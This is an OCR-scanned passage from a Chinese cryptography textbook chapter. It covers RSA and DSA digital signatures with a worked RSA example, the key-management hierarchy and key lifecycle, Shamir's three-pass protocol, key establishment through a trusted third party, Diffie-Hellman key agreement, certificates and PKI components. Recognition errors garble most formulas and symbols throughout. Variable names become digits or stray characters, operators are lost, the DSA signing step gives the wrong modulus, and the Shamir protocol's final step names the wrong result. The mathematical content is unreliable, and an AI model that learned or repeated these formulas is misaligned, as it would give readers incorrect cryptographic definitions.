首先 选取 两 个 长 度 接近 的 大 素数 p 和 49 (推荐 至 少 1024 位 ) ,计算 "一 2 ,其 欧 拉 本 数 
9 (nn) 二 (p 一 1)(g 一 1)。 然 后 随机 选取 整数 e(1 二 e 二 g (7z) ) ,满足 gcd(e,p(z)) 一 1。 计 算 
d ,满足 de 三 1(mod g(n))。n 公开 ,p 和 g 保密 。e 为 公 钥 ,d 为 私 钥 。 

2) 签名 生成 

(1) 利用 一 个 安全 的 Hash 函数 hh 来 产生 消息 摘要 hm)。 

(2) 用 签名 算法 计算 签名 * 一 Signa (mm) 夺 hh(m)* mod n。 

3) 签名 验证 

(1) 首先 利用 共享 的 Hash 函数 六 计 算 消 息 摘要 户 (m) 。 

(2) 检验 等 式 h(m) mod n 三 s* mod n 是 否 成 立 , 若 相 等 签名 有 效 ,否则 ,签名 无 效 。 

【 例 4-5】 RSA 数字 签名 算法 实例 。 

系统 初始 化 : 假设 A 选取 p= 二 13,g= 二 11,e==13, 则 有 n=pq==143,9(n)==(p 一 1) 
(g 一 1)= 二 12X10= 二 120。 求解 ed 二 13d 三 1(mod 120) 得 d= 二 37。 因 此 A 的 公 钥 为 (n= 
143,e 二 13); 私 钥 为 d= 二 37。 

签名 过 程 : 假定 消息 mw 的 Hash 值 hm) 二 16, 则 计算 m 签名 

s=h(m)"* modn= 1637 mod 143 三 3 
验证 过 程 : 接收 者 B 收 到 签名 后 ,计算 
smod n= 313 mod 143 夺 16, h(m) modn16 mod 143 三 16 
等 式 有 (m) mod zz 一 mod n 成立。 因此 ,B 验证 此 签名 有 效 。 

RSA 签名 方案 中 使 用 了 Hash 函数 ,使 用 这 个 函数 比 单纯 对 消息 本 身 进行 签名 具有 
更 好 的 抗 攻击 性 。 另 外 ,对 于 大 消息 而 言 , 对 其 Hash 值 的 签名 不 仅 不 失 数字 签名 特征 ， 
而 且 大 大 提高 其 签名 和 验证 的 效率 。 

2. DSA 签名 体制 

1994 年 12 月 美国 国家 标准 和 技术 研究 所 (National Institute of Standard and 
Technology, NIST) 正 式 颁 布 了 数字 签名 标准 (Digital Signature Standard, DSS)。DSS 
最 初 建议 使 用 p 为 512 位 的 素数 ,g 为 160 位 的 素数 ,后 来 在 众多 的 批评 下 ,NIST 将 DSS 
的 密 钥 p 从 原来 的 512 位 增加 到 介 于 512 位 到 1024 位 之 间 。 当 p 选 为 512 位 的 素数 时 ， 
ElGamal 签名 的 长 度 为 1024 位 ,而 DSS 中 通过 160 位 的 素数 g 可 将 签名 的 长 度 降 低 为 
320 位 ,这 就 大 大 地 减少 了 存储 空间 和 传输 带宽 。 
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由 于 DSS 具有 较 大 的 兼容 性 和 适用 性 ,因此 DSS 将 得 到 广泛 的 应 用 。 数 字 签 名 标准 
DSS 中 的 算法 常 称 为 DSA(Digital Signature Algorithm) 。 

1) 系统 初始 化 

(1) 选取 一 个 素数 如 ,其 中 ,250+ 的 <p<252+ 的 (JE{0, 1 8))3 

(2) 选取 p 一 1 的 一 个 160 位 的 素数 因子 q(2'”<g<2'"); 

(3) 计算 g=h? ?4 mod p, 其 中 1<h<<p 一 1; 

(4) 生成 一 个 随机 数 xz(0 二 zx 二 gq); 

(5) 计算 y==g” mod p。 

公 钥 为 (p,q,g，,y), 私 钥 为 工 。 

2) 签名 生成 

对 明文 m 的 签名 算法 如 下 : 

(1) 生成 一 个 随机 数 有 (0 二 k 二 gq); 

(2) 计算 r=(g* mod p)mod g; 

(3) 计算 s==(k71(SHA-1(m) 十 zr))mod p, 其 中 ,SHA-1(m) 是 用 SHA-1 算法 对 明 
文 m 进行 Hash 运算 。 

签名 为 (myrys)。 

3) 签名 验证 

对 一 个 签名 Gm ,r,s ) 的 验证 过 程 如 下 : 

(1) 计算 w= (5 7 ; 

(2) 计算 w==(SHA-1(m)w)mod g; 

(3) 计算 w= 二 (rw)mod g; 

(4) 计算 v=((g"y*)mod p)mod gq; 

(5) 检验 v 是 否 等 于 +” 。 

只 有 当 上 述 算法 中 v 一 二 时 ,接收 的 签名 才 被 验证 。 

DSA 算法 是 基于 有 限 域 上 的 离散 对 数 问题 设计 的 ,DSA 算法 不 是 标准 的 公 钥 密码 ， 
它 只 能 提供 数字 签名 功能 ,但 是 由 于 具有 和 良好 的 安全 性 和 灵活 性 ,被 广泛 应 用 于 金融 等 领 
域 。 常 见 的 数字 签名 算法 还 有 ElIGamal、 椭 圆 曲线 数字 签名 算法 等 ,另外 还 有 一 些 特 殊 的 
数字 签名 算法 ,如 盲 签 名、 代理 签名 、 群 签名 门限 签名 等 ,它们 与 具体 应 用 环境 密切 相关 。 


4.6 密 钥 管理 技术 


现代 密码 体制 要 求 密码 算法 是 可 以 公开 评估 的 ,整个 密码 系统 的 安全 性 并 不 取决 对 
密码 算法 的 保密 或 者 是 对 密码 设备 等 的 保护 ,决定 整个 密码 体制 安全 性 的 因素 是 密 钥 的 
保密 性 。 密 钥 管理 是 密码 学 许多 技术 (如 机 密 性 数据 源 认 证 、 数 据 完整 性 和 数据 签名 等 ) 
的 基础 ,在 整个 密码 系统 中 是 极其 重要 的 , 密 钥 的 管理 水 平 直接 决定 了 密码 的 应 用 水 平 。 

密 钥 管理 处 理 密 钥 自 产 生 到 最 终 销毁 的 整个 过 程 中 的 所 有 问题 ,包括 钥 的 生成 、 存 
储 、 分 配 /协商 、 使 用 备份 /恢复 更新、 撤销 和 销毁 等 。 密 钥 管理 不 仅 影响 系统 的 安全 性 ， 
而 且 涉 及 系统 的 可 靠 性 有效 性 和 经 济 性 。 当 然 , 密 钥 管理 也 涉及 物理 因素 .人 为 因素 以 
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及 策略 制度 等 方面 的 一 些 问题 ,这 里 我 们 主要 介绍 理论 和 技术 层面 的 一 些 基 本 知识 。 
461 密 钥 管理 的 层次 结构 


由 于 应 用 需求 和 功能 上 的 差异 ,在 密码 系统 中 所 使 用 的 密 钥 种 类 还 是 比较 多 的 ,例如 
按照 加 密 内 容 的 不 同 , 密 钥 可 以 分 为 用 于 一 般 数 据 加 密 的 密 钥 和 用 于 密 钥 加 密 的 密 钥 ; 按 
照 所 完成 功能 的 差异 , 密 钥 可 以 分 为 用 于 验证 数据 签名 的 密 钥 ( 公 钥 ) 和 用 于 实现 数据 签 
名 的 密 钥 ( 私 钥 )。 根 据 不 同 种 类 密 钥 所 起 的 作用 和 重要 性 不 同 , 现 有 的 密码 系统 的 设计 
大 都 采用 了 层次 化 的 密 钥 结构 ,这 种 层次 化 结构 与 对 系统 的 密 钥 控制 关系 是 对 应 的 ， 
图 4-24 表 示 一 个 常用 (三 级 ) 的 简化 密 钥 管理 的 层次 结构 。 


/ 主 害 几 = 二 二 = 一 /| 芋 密 钥 \ 
密 角 加 密 密 钥 “\Y---- 苏 | --- =/ 密 钥 加 密 密 铀 
议 
会 话 密 钥 =| 上 会 话 密 钥 
1 y 
明文 一 | 加密 各 | 解密 一 明文 


图 4-24 密 钥 管理 的 层次 结构 图 


一 般 情况 下 ,按照 密 钥 的 生存 周期 .功能 和 保密 级 别 可 以 将 密 钥 分 为 3 类 : 会 话 密 
钥 、 密 钥 加 密 密 钥 和 主 密 钥 。 系 统 使 用 主 密 钥 通过 某 种 密码 算法 保护 密 钥 加 密 密 钥 ,再 使 
用 密 钥 加 密 密 钥 通过 密码 算法 保护 会 话 密 钥 ,不 过 密 钥 加 密 密 钥 可 能 不 止 一 个 层次 ,最 后 
会 话 密 钥 基 于 某 种 加 解密 算法 来 保护 明文 数据 。 在 整个 密 钥 层次 体系 中 ,各 层 密 钥 的 使 
用 由 相应 层次 的 密 钥 协议 控制 。 

(1) 会 话 密 钥 。 在 一 次 通信 或 数据 交换 中 ,用 户 之 间 所 使 用 的 密 钥 ,是 由 通信 用 户 之 
间 进 行 协商 得 到 的 。 它 一 般 是 动态 地 、 仅 在 需要 进行 会 话 数据 加 密 时 产生 ,并 在 使 用 完毕 
后 立即 清除 掉 的 , 主要 用 来 对 传输 的 数据 进行 保护 ,也 称 为 数据 加 密 密 钥 (Data 
Encrypting Key)。 它 位 于 密码 系统 中 整个 密 钥 层次 的 最 低层 , 仅 对 临时 的 通话 或 交换 数 
据 使 用 。 

会 话 密 钥 可 由 通信 双方 协商 得 到 ,也 可 由 可 信 的 第 三 方 (Trusted Third Party, TTP) 
分 配 。 一 般 来 说 ,会 话 密 钥 只 有 在 需要 时 才 通 过 协议 取得 ,用 完 后 就 丢掉 了 ,从 而 可 降低 
密 钥 的 分 配 存储 量 。 另 外 ,因为 会 话 密 钥 加 密 的 数据 有 限 , 即 使 密 钥 丢失 ,其 损失 也 是 有 
限 的 。 基 于 运算 速度 的 考虑 ,会 话 密 钥 普遍 是 某 一 种 对 称 加 密 算法 的 加 密 密 钥 。 

(2) 密 钥 加 密 密 钥 。 一 般 是 用 来 对 传输 的 会 话 密 钥 进 行 加 密 时 采用 的 密 钥 ,又 称 为 
次 主 密 钥 或 者 二 级 密 钥 (Secondary Key) 。 密 钥 加 密 密 钥 所 保护 的 对 象 是 实际 用 来 保护 
通信 或 文件 数据 的 会 话 密 钥 。 密 钥 加 密 密 钥 的 保密 级 别 较 高 ,在 主机 和 一 些 密码 设备 中 ， 
存储 这 种 密 钥 的 装置 应 有 断 电 保护 ,认证 和 防 窜 扰 . 防 欺 诈 等 控制 功能 。 

密 钥 加 密 密 钥 是 为 了 保证 两 结 点 间 安 全 传递 会 话 密 钥 或 下 层 密 钥 而 设置 的 ,处 在 密 


第 4 章 密码 学 


钥 管 理 的 中 间 层 。 系 统 因 使 用 的 密码 体制 不 同 , 它 可 以 是 公 钥 ,也 可 以 是 共享 密 钥 。 

(3) 主 密 钥 。 主 密 钥 对 应 于 层次 化 密 钥 结构 中 的 最 高 层次 , 它 是 由 用 户 选 定 或 由 系 
统 分 配给 用 户 的 可 在 较 长 时 间 内 由 用 户 所 专 有 的 秘密 密 钥 ,在 某 种 程度 上 , 主 密 钥 还 起 
到 标识 用 户 的 作用 。 一 般 保存 在 网 络 中 心 、 主 结 点 、 主 处 理 机 或 专用 硬件 设备 中 ,受到 严 
格 的 保护 。 此 外 ,对 于 主 密 钥 的 分 配 传送 往往 采用 人 工 的 方式 ,由 可 信 的 邮差 、 保 密 人 员 

密 钥 的 分 级 系统 大 大 提高 了 密 钥 的 安全 性 。 一 般 来 说 , 越 低级 的 密 钥 更 换 速度 越 快 ， 
最 低层 的 密 钥 可 以 做 到 一 次 一 换 。 在 分 级 结构 中 ,低级 密 钥 具有 相对 独立 性 。 一 方面 , 它 
们 被 破译 不 会 影响 到 上 级 密 钥 的 安全 ; 另 一 方面 ,它们 的 生成 方式 结构、 内容 可 以 根据 某 
种 协议 不 断 变 换 。 

对 于 攻击 者 , 密 钥 的 分 级 系统 意味 着 他 所 攻击 的 是 一 个 动态 系统 。 对 于 静态 密 钥 系 
统 ,一 份 报 文 的 破译 就 可 以 导致 使 用 该 密 钥 的 所 有 报 文 的 泄露 。 而 对 于 动态 密 钥 系 统 , 由 
于 低级 密 钥 是 在 不 断 变化 中 的 ,因而 一 份 报 文 的 破译 造成 的 影响 有 限 , 且 直接 对 主 密 钥 发 
起 攻击 也 是 很 困难 的 。 一 方面 ,对 主 密 钥 保 护 是 相当 严格 的 ,采取 了 各 种 物理 手段 ; 另 一 
方面 , 主 密 钥 的 使 用 次 数 很 少 。 

密 钥 的 分 级 系统 更 大 的 优点 还 在 于 , 它 使 得 密 钥 管理 自动 化 成 为 可 能 。 对 于 一 个 大 
型 密码 系统 而 言 ,其 需要 的 密 钥 数量 是 庞大 的 ,都 采用 人 工交 换 的 方式 来 获得 密 钥 已 经 不 
可 能 。 在 分 级 系统 中 ,只 有 主 密 钥 需 要 人 工装 和 ,其 他 各 级 密 钥 均 可 以 由 密 钥 管理 系统 按 
照 某 些 协议 来 进行 自动 地 分 配 更换、 撤销 等 。 这 既 提高 了 工作 效率 ,也 提高 了 安全 性 。 
管理 人 员 掌 握 着 核心 密 钥 ,他 们 不 直接 接触 普通 用 户 使 用 的 密 钥 与 明文 数据 ,普通 用 户 也 
无 法 接触 到 核心 密 钥 ,这 使 得 核心 密 钥 的 扩散 面 减 到 最 小 。 
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在 对 称 密码 体制 下 ,必须 通过 安全 可 靠 的 途径 将 密 钥 送 至 接收 端 ,系统 的 保密 性 取决 
于 密 钥 的 安全 性 。 因 此 , 密 钥 的 产生 和 密 钥 的 管理 是 一 个 重要 的 研究 课题 , 即 如 何 产生 满 
足 保密 要 求 的 密 钥 以 及 将 密 钥 安 全 可 靠 地 分 配给 通信 对 方 。 密 钥 的 产生 、 分 配 、 存 储 、 销 
毁 等 都 是 密 钥 管 理 的 范畴 。 再 好 的 密码 算法 ,如 果 密 钥 管 理 出 现 问题 ,就 很 难保 证 系统 的 
安全 性 。 

每 个 密 钥 都 有 其 生命 周期 ,有 其 自身 的 产生 、 使 用 和 消亡 的 过 程 。 在 密 钥 的 生命 周期 
中 有 4 个 主要 的 状态 : 即将 活动 状态 、 活 动 状态 、 活 动 后 状态 和 废弃 状态 (如 图 4-25 所 
示 )。 在 即将 活动 状态 中 , 密 钥 已 经 生成 ,但 还 未 投入 实际 使 用 。 活 动 状 态 是 指 密 钥 已 在 
实际 的 密码 系统 中 使 用 。 在 活动 后 状态 中 , 密 钥 已 不 能 像 在 活动 状态 中 一 样 正常 使 用 了 ， 

产生 重新 激活 


| | | | 
本 
即将 活动 状态 活动 状态 2 活动 后 状态 全 二 废弃 状态 


销毁 
4-25 密 钥 的 生命 周期 
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如 只 能 用 于 解密 和 验证 。 废 弃 状 态 是 指 密 钥 已 经 不 可 使 用 了 ,所 有 与 此 密 钥 有 关 的 记录 
都 应 被 删除 。 

密 钥 的 建立 是 信息 安全 通信 中 的 关键 问题 ,对 安全 通信 的 实现 有 着 重要 的 影响 。 下 
面 着 重 介绍 会 话 密 钥 的 建立 方法 。 

按照 是 否 需 要 第 三 方 可 信 机 构 来 分 ,可 分 为 无 中 心 的 密 钥 建立 和 有 中 心 的 密 钥 建 
立方 式 两 类 。 无 中 心 的 密 钥 建立 是 指 用 户 直 接 将 密 钥 传送 给 对 方 ,此 时 参与 者 通常 需 
要 事先 掌握 一 些 资源 。 如 果 使 用 对 称 密码 技术 ,在 点 对 点 的 密 钥 建立 过 程 中 ,要 求 在 
建立 密 钥 之 前 参与 协议 的 双方 事先 共享 一 个 对 称 密 钥 ,以 便 使 用 此 共享 的 对 称 密 钥 作 
为 密 钥 加 密 密 钥 来 保护 建立 密 钥 时 双方 的 通信 。 如 果 使 用 公 钥 密码 技术 ,那么 参与 协 
议 的 双方 也 要 事先 知道 对 方 的 公 钥 。 此 外 ,也 有 些 密 钥 建立 协议 不 需要 事先 拥有 密 钥 
加 密 密 钥 。 

1. 无 中 心 的 密 钥 建 立 

这 里 先 介绍 一 个 Shamir 设计 的 无 第 三 方 参与 的 密 钥 建立 协议 。 在 协议 过 程 中 ,用 
户 A 和 B 无 须 事先 交换 任何 密 钥 ,通过 三 次 交互 即 可 完成 密 钥 传 递 ,从 而 能 够 进行 保 
密 通信 。 该 协议 实现 的 前 提 是 存在 一 种 可 交换 的 对 称 密码 算法 , 即 Ea (Es(m)) 二 
Es (Ea (m)), 

协议 过 程 描述 如 下 : 

(1) A 用 自己 的 密 钥 加 密 & 得 到 密 文 c: 王 BEA(CR) ,将 密 文 ci 传送 给 B。 

(2) B 用 自己 的 密 钥 加 密 ci 得 到 密 文 co 二 Es(Es(k)) ,将 密 文 cs 传送 给 A。 

(3) A 用 自己 的 密 钥 解密 cs 得 到 c: 王 DA(CEs(CEA(C))) 一 DA(CEACEs(R))) 一 EeeCR)， 
将 cs 传送 给 B。 

(4) B 用 自己 的 密 钥 解密 cs 得 到 A。 

虽然 这 个 协议 可 以 保证 密 钥 的 正确 性 ,但 是 由 于 没有 提供 身份 认证 ,很 容易 在 执行 过 
程 中 发 生 冒 充 行为 。 因 此 ,在 使 用 此 协议 时 ,需要 有 其 他 配套 协议 提供 身份 认证 。 

2. 基于 可 信 第 三 方 的 密 钥 建立 

虽然 已 有 协议 可 以 在 用 户 直 接 进行 密 钥 建立 ,但 是 也 存在 一 些 问题 。 以 点 对 点 密 钥 
建立 为 例 , 随 着 用 户 的 增多 ,用 户 需要 事先 掌握 的 密 钥 加 密 密 钥 数量 也 大 大 增加 , 密 钥 的 
预 分 配 问题 很 难 解 决 。 如 果 用 户 能 和 可 信 第 三 方 (如 密 钥 分 配 中 心 ) 之 间 建 立 了 共享 密 
钥 ,那么 可 以 借助 可 信 第 三 方 的 帮助 ,在 任何 两 个 互 不 认识 的 用 户 之 间 建 立 一 个 共享 密 
钥 , 这 样 无 论 系统 有 多 少 用 户 , 预 分 配 的 密 钥 数量 都 是 1。 

设 可 信 第 三 方 TTP 提供 密 钥 的 产生 、 密 钥 的 鉴别 、 密 钥 的 分 发 等 服务 。 发 送 者 A 和 
接收 者 B 分 别 与 可 信 第 三 方 TTP 共享 一 个 密 钥 ,A 与 TTP 的 共享 密 钥 为 sr,B 与 TTP 
的 共享 密 钥 为 kpr ,A 和 B 可 以 有 两 种 途径 建立 密 钥 。 

用 户 选择 共享 密 钥 : A 产生 与 B 共享 的 密 钥 ka ,将 密 钥 kas 用 A 与 TTP 的 共享 密 
钥 hat 加密 ,然后 把 加 密 的 结果 Ei (kas) 传 送 给 TTP。TTP 接收 到 A 发 送 的 加 密 消息 
后 ,用 与 A 共享 的 密 钥 kat 解 密 后 得 到 ka ,再 用 与 B 共享 的 密 钥 kar 加密 kas ,然后 把 加 
密 的 结果 Ei,, (kas ) 传 送 给 B, 或 者 把 加 密 的 结果 传送 给 A 再 由 A 传 给 B。B 用 与 TTP 
共享 的 密 钥 kat 解密 后 得 到 kas( 如 图 4-26 所 示 )。 
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图 4-26 ”用户 选 择 共享 密 钥 的 密 钥 建立 过 程 


TTP 选择 共享 密 钥 : A 要 求 TTP 产生 密 钥 kap ,TTP 产生 密 钥 kap 后 分 别 用 与 A 共 
享 的 密 钥 kar 和 与 B 共享 的 密 钥 kr 加密 kas ,然后 把 加 密 的 结果 Er (kap) 和 Er (CRAB) 
分 别传 送 给 A 和 B, 或 者 TTP 把 加 密 的 结果 都 传送 给 A 再 由 A 传送 给 B。A 和 B 分别 
用 与 TTP 共享 的 密 钥 kr 和 kpt 解 密 后 得 到 kas( 如 图 4-27 示 )。 
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图 4-27 TIP 选择 共享 密 钥 的 密 钥 建立 过 程 


这 里 我 们 忽略 身份 认证 及 防止 重 放 、 算 改 等 方面 的 技术 , 仅 对 基本 思想 、 交 互 方式 进 
行 介 绍 。 这 些 思想 对 设计 会 话 密 钥 建立 协议 有 指导 意义 ,派生 出 很 多 重要 的 协议 ,如 
Kerberos 密 钥 分 发 协议 等 。 
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在 非 对 称 密码 系统 中 , 公 钥 是 公开 的 。 公 钥 的 这 种 公开 性 为 信息 安全 通信 带 来 了 深 
远 的 影响 ,同时 也 为 攻击 者 提供 了 可 乘 之 机 。 例 如 ,攻击 者 可 以 用 一 个 假 公 钥 替换 用 户 的 
真实 公 钥 。 因 此 ,发 展 安全 公 钥 密码 系统 的 关键 问题 是 如 何 确保 公 钥 的 真实 性 。 我 们 将 
从 密 钥 协商 和 公 钥 证 书 两 个 方面 来 讨论 针对 公 钥 密码 系统 的 密 钥 管理 方法 和 技术 。 

公 钥 密码 系统 的 一 个 重要 应 用 是 分 配 会 话 密 钥 ,使 两 个 互 不 认识 的 用 户 可 以 建立 一 
个 共享 密 钥 ,然后 双方 就 可 以 利用 该 共享 密 钥 保障 通信 的 安全 。 例 如 ,A 和 了 相互 发 送 
消息 ,A 首先 建立 一 个 共享 密 钥 key, 并 用 B 的 公 钥 k. 加 密 key 得 到 密 文 c= 二 E(k. ,key)， 
然后 把 密 文 c 传送 给 B。 接 收 方 B 用 自己 的 私 钥 k 解密 密 文 c 得 到 共享 密 钥 key 一 
D(k4,c)。 最 终 ,A 和 B 可 以 利用 共享 密 钥 key 来 保障 双方 会 话 的 安全 。 在 这 种 密 钥 建 
立 的 过 程 中 ,只 有 A 对 密 钥 的 建立 有 贡献 ,B 只 是 被 动 地 接收 A 发 送 的 密 钥 。 为 了 增加 
密 钥 的 随机 性 ,有 时 需要 通信 双方 都 对 密 钥 的 建立 做 出 贡献 。 密 钥 协商 就 是 这 样 的 一 种 
密 钥 建立 方法 。 

1. Diffie-Hellman 密 钥 协 商 

Diffie-Hellman 密 钥 协商 提供 了 对 密 钥 分 发 的 第 一 个 实用 的 解决 办 法 ,使 互 不 认识 
的 双方 通过 公共 信道 交换 信息 建立 一 个 共享 的 密 钥 。Diffie-Hellman 密 钥 协商 是 一 种 指 
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数 密 钥 交换 ,其 安全 性 基于 离散 对 数 难 解 问题 。 

A 和 B 可 以 通过 执行 下 面 的 协议 建立 一 个 共享 密 钥 。 假 设 p 是 一 个 足够 大 的 素数 ， 
8 是 模 p 的 满足 一 定 条 件 的 元 素 (g 是 Z; 中 的 本 原 根 ),p 和 g 是 公开 的 。Diffie- 
Hellman 密 钥 协商 协议 过 程 如 下 : 

(1) A 随机 选择 a, 满足 1<a<<p 一 1, 计 算 c 一 gs mod p 并 把 c 传送 给 B。 

(2) B 随机 选择 5 满足 1 过 5b 三 p 一 1, 计 算 d= 二 g* mod p 并 把 4 传送 给 A。 

(3) A 计算 共享 密 钥 k=d* 二 g* mod p。 

(4) B 计 算 共 享 密 钥 k==c==g* mod p。 

此 协议 可 以 很 容易 扩展 到 多 人 的 密 钥 协商 ,但 是 由 于 该 协议 不 包括 通信 方 之 间 的 身 
份 认 证 过 程 , 所 以 容易 受到 中 间 人 攻击 。 为 了 抵抗 这 种 攻击 ,在 协议 运行 过 程 中 需要 结合 
认证 技术 。 

2. 公 钼 证 书 

数字 证 书 在 公 钥 管理 技术 中 扮演 了 重要 角色 ,使 公 钥 能 通过 不 安全 的 媒介 存储 和 传 
输 而 不 会 被 算 改 。 数 字 证 书 由 可 信任 的 认证 机 构 (Certification Authority,CA) 使 用 公 
签名 方案 签署 。 每 个 人 都 知道 认证 机 构 的 公 钥 。 认 证 机 构 的 公 钥 可 以 用 于 验证 由 该 认证 
机 构 签署 的 证 书 。 

公 钥 证 书 (Public Key Certificate) 是 一 种 包含 持 证 主体 标识 、 持 证 主体 公 钥 等 信息 ， 
并 由 可 信任 的 认证 机 构 CA 签署 的 信息 集合 。 公 钥 证 书 主要 用 于 确保 公 钥 及 其 与 用 户 绑 
定 关系 的 安全 。 

公 钥 证 书 能 以 明文 的 形式 进行 存储 和 分 配 ,任何 一 个 用 户 只 要 知道 可 信任 的 认证 机 
构 CA 的 公 钥 ,就 能 验证 证 书 的 合法 性 。 如 果 验 证 正确 ,那么 用 户 就 可 以 相信 该 证 书 所 携 
带 的 公 钥 是 真实 的 ,而 且 这 个 公 钥 就 是 证 书 所 标识 的 那个 主体 的 合法 公 钥 。 

存储 在 公 钥 证 书 中 的 最 重要 的 信息 有 : 证 书 持 有 者 的 标识 证书 持 有 者 的 公 钥 、 认 证 
机 构 的 标识 .证 书 的 序列 号 .证书 的 有 效 期 .认证 机 构 的 签名 等 。 

可 信 的 认证 机 构 CA 的 主要 任务 是 : 验证 与 一 个 公 钥 相连 的 实体 的 真实 性 ,把 每 个 
公 钥 和 可 识别 的 名 字 绑 定 并 注册 ,为 实体 颁发 公 钥 证 书 。 当 用 户 A 向 可 信 的 认证 机 构 
CA 申请 公 钥 证 书 时 ,A 需要 向 CA 证 明 身 份 ,产生 公 钥 和 私 钥 对 ,并 把 公 钥 的 一 个 副本 
交 给 CA ,或 者 由 CA 产生 公 钥 和 私 钥 对 ,并 把 私 钥 交 给 A, 然 后 ,CA 把 公 钥 和 必需 的 信 
息 一 起 放 在 证 书 里 ,用 CA 的 私 钥 签 名 证 书 。 

用 户 A 可 以 把 公 钥 证 书 存储 在 家 里 , 当 需 要 的 时 候 再 把 证 书 提供 出 来 。 在 开放 系统 
中 ,一 种 更 好 的 存储 公 钥 证 书 的 方法 是 证 书目 录 。A 可 以 把 公 钥 证 书 存储 在 证 书目 录 里 
以 方便 查询 。 证 书目 录 是 一 种 分 布 式 数据 库 ,通常 由 可 信 的 认证 机 构 CA 维护 ,以 确保 证 
书 的 搜寻 和 检索 的 可 信 。 

如 果 用 户 B 想 加 密 一 条 消息 给 A 或 者 验证 一 个 声称 是 A 产生 的 签名 ,B 可 以 从 证 书 
目录 或 者 从 A 那儿 检索 证 书 并 验证 认证 机 构 的 签名 。 如 果 验 证 成 功 ,B 确信 从 证 书 中 得 
到 了 A 的 公 钥 并 且 可 以 使 用 这 个 公 钥 。 

如 果 A 的 私 钥 汇 露 了 ,对 应 的 公 钥 就 再 也 不 能 用 来 加 密 消息 了 ,同时 A 再 也 不 能 用 
这 个 私 钥 签署 任何 消息 。 而 且 ,A 可 能 否认 从 此 以 后 用 这 个 私 钥 产 生 的 任何 签名 。 因 


第 4 章 密码 学 


此 ,A 私 钥 泄露 的 事实 必须 被 公布 。 当 然 , 认 证 机 构 需 要 从 证 书目 录 里 撤销 A 的 证 书 。 
然而 ,证 书 可 能 已 经 被 检索 ,并 且 还 没有 过 期 ,不 可 能 通知 所 有 持 有 A 证 书 副本 的 用 户 ， 
因为 认证 机 构 不 知道 这 些 用 户 。 对 这 个 问题 的 一 种 解决 办 法 是 维护 一 个 证 书 撤销 列表 。 
证 书 撤销 列表 登记 了 相应 被 撤销 的 证 书 的 名 单 。 为 了 保证 可 信 性 ,认证 机 构 必须 对 列表 
签名 。 

公 钥 密码 技术 与 对 称 密 钥 技术 的 最 大 区 别 就 是 : 用 公 钥 技术 加 密 消息 ,通信 双方 不 
需要 事先 通过 共享 的 安全 信道 协商 密 钥 。 加 密 方 只 要 得 到 接收 方 的 公开 密 钥 就 可 以 加 密 
消息 ,并 将 加 密 后 的 消息 发 送 给 接收 方 。 由 于 公 钥 是 公开 的 ,因此 需要 一 种 机 制 来 保证 用 
户 得 到 的 公 钥 是 正确 的 , 即 需要 保证 一 个 用 户 的 公 钥 在 发 布 的 时 候 是 真实 的 ,在 发 布 以 后 
不 会 被 恶意 自 改 。 公 钥 管 理 技术 为 公 钥 的 分 发 提供 可 信 的 保证 。 
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公 钥 基础 设施 (Public Key Infrastructure,PKI) 是 网 络 安 全 的 基础 。 其 原理 是 利用 
非 对 称 密码 算法 原理 和 技术 所 构建 的 ,用 来 解决 网 络 安全 问题 的 一 种 普遍 适用 的 基础 设 
施 。 有 的 学 者 把 提供 全 面 安全 服务 的 基础 设施 ,包括 软件 、 硬 件 . 人 员 和 策略 的 集合 称 为 
PKI。PKI 在 网 络 信息 空间 的 地 位 相当 于 电力 基础 设施 在 工业 中 的 地 位 。 可 以 说 PKI 是 
目前 电子 商务 和 电子 政务 所 必 不 可 少 的 安全 基础 。 

PKI 体系 结构 采用 证 书 管理 公 钥 ,通过 第 三 方 的 可 信 机 构 ,把 用 户 的 公 钥 和 用 户 的 其 
他 标识 信息 (如 名 称 `E-mail,. 身 份 证 号 等 ) 拥 绑 在 一 起 ,在 互联 网 上 验证 用 户 的 身份 ,提供 
安全 可 靠 的 信息 处 理 。PKI 体系 结构 把 公 钥 密码 和 对 称 密码 结合 起 来 ,在 Internet 上 实 
现 密 钥 的 自动 管理 。 其 主要 目的 是 通过 自动 管理 密 钥 和 证 书 , 为 用 户 建立 起 一 个 安全 的 
网 络 运行 环境 ,使 用 户 可 以 在 多 种 应 用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 ,从 而 保证 
网 上 数据 的 机 密 性 、 完 整 性 和 不 可 抵赖 性 。 一 个 有 效 的 PKI 系统 必须 是 完整 的 和 透明 
的 ,用 户 在 获取 加 密 和 数字 签名 服务 时 ,不 需要 了 解 PKI 是 怎样 管理 证 书 和 密 钥 的 。 

公 钥 基础 设施 (PKD 是 一 种 遵循 标准 的 密 钥 管理 平台 ,涉及 多 个 实体 之 间 的 协作 过 
程 ,主要 包括 : 认证 中 心 (Certificate Authority, CA) ,注册 机 构 (Registration Authority， 
RA) .证 书 数据 库 (Certificate Database) 、 密 钥 管 理 系 统 (Key Manage System) ,证 书 撤销 
管理 系统 (Certificate Revocation List Manage System) 和 PKI 应 用 接口 系统 (PKI 
Application Interface System) 及 最 终 用 户 。 

1. 认证 中 心 

在 公 钥 密码 体制 环境 中 ,必须 有 一 个 可 信 的 机 构 来 对 任何 一 个 实体 的 公 钥 进行 验证 ， 
证 明 实 体 的 身份 以 及 他 与 公 钥 的 匹配 关系 。 认 证 中 心 CA 正 是 这 样 的 机 构 , 它 是 证 书 的 
签发 机 构 , 是 PKI 系统 的 核心 。 证 书 是 一 种 权威 性 的 电子 文档 ,如 同 网 络 计算 环境 中 的 
一 种 身份 证 ,用 于 证 明 某 一 主体 (如 和 人、 服务 器 等 ) 的 身份 及 其 公开 密 钥 的 合法 性 。 

CA 的 功能 包括 : 接受 证 书 请 求 ;证 书签 发 .审核 制作; 证书 发 布 ;证 书 的 归档 及 撤 
销 ; 证 书 的 更 新 ; 密 钥 的 备份 与 恢复 ;交叉 认证 。 属 于 不 同 CA 的 用 户 之 间 , 当 他 们 要 检查 
对 方 证 书 的 合法 性 时 ,需要 交叉 认证 ,交叉 认证 扩展 了 第 三 方 认证 的 范围 。 
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2. RA 子 系统 

RA 可 以 看 作 是 PKI 的 一 个 扩展 部 分 。 随 着 一 个 PKI 区 域 的 最 终 实体 数量 的 增加 ， 
施加 在 一 个 CA 上 的 负载 也 随 之 增加 。RA 可 以 充当 CA 和 它 的 最 终 用 户 之 间 的 中 间 实 
体 ,辅助 CA 来 完成 它 的 证 书生 成 功能 ,并 且 可 以 将 CA 从 不 安全 的 环境 中 分 离 出 去 。 

RA 子 系统 包括 RA 的 初始 化 、 操 作 员 管理 .证 书 申请 录入 、 证 书 申请 审核 .证 书 申请 
